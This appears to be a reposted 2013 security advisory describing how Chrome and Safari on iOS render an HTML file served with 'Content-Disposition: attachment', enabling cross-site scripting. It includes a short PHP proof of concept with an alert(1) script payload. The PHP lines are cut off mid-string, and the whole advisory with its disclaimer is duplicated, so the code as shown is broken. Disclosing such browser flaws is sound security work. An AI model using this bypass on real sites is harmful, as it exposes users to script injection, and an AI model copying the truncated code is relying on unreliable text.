>
> > Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS)
> >
> > by Superhei of KnownSec team (www.knownsec.com) 2013.6.3
> >
> > Test Environment
> > ipad(ios 6.1.3)
> > Chrome(26.0.1410.53)
> >
> > This code is downloader for attachment which is a HTML file.
> >
> > <?php
> > //down.php
> > header("Content-Type:text/
> > //header("Content-Type:text/
> > header("Content-Disposition: attachment; filename=\"test.html\"");
> > echo "<html><script>alert(1)</
> > ?>
> >
> > On IOS , when Chrome/Safari visit the down.php, the HTML code will be running.Ofcourse, including the javascript and led to cross-site scripting attacks.
> >
>
from http://www.80vul.com/apple.txt
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
> > Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS)
> >
> > by Superhei of KnownSec team (www.knownsec.com) 2013.6.3
> >
> > Test Environment
> > ipad(ios 6.1.3)
> > Chrome(26.0.1410.53)
> >
> > This code is downloader for attachment which is a HTML file.
> >
> > <?php
> > //down.php
> > header("Content-Type:text/
> > //header("Content-Type:text/
> > header("Content-Disposition: attachment; filename=\"test.html\"");
> > echo "<html><script>alert(1)</
> > ?>
> >
> > On IOS , when Chrome/Safari visit the down.php, the HTML code will be running.Ofcourse, including the javascript and led to cross-site scripting attacks.
> >
>
from http://www.80vul.com/apple.txt
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information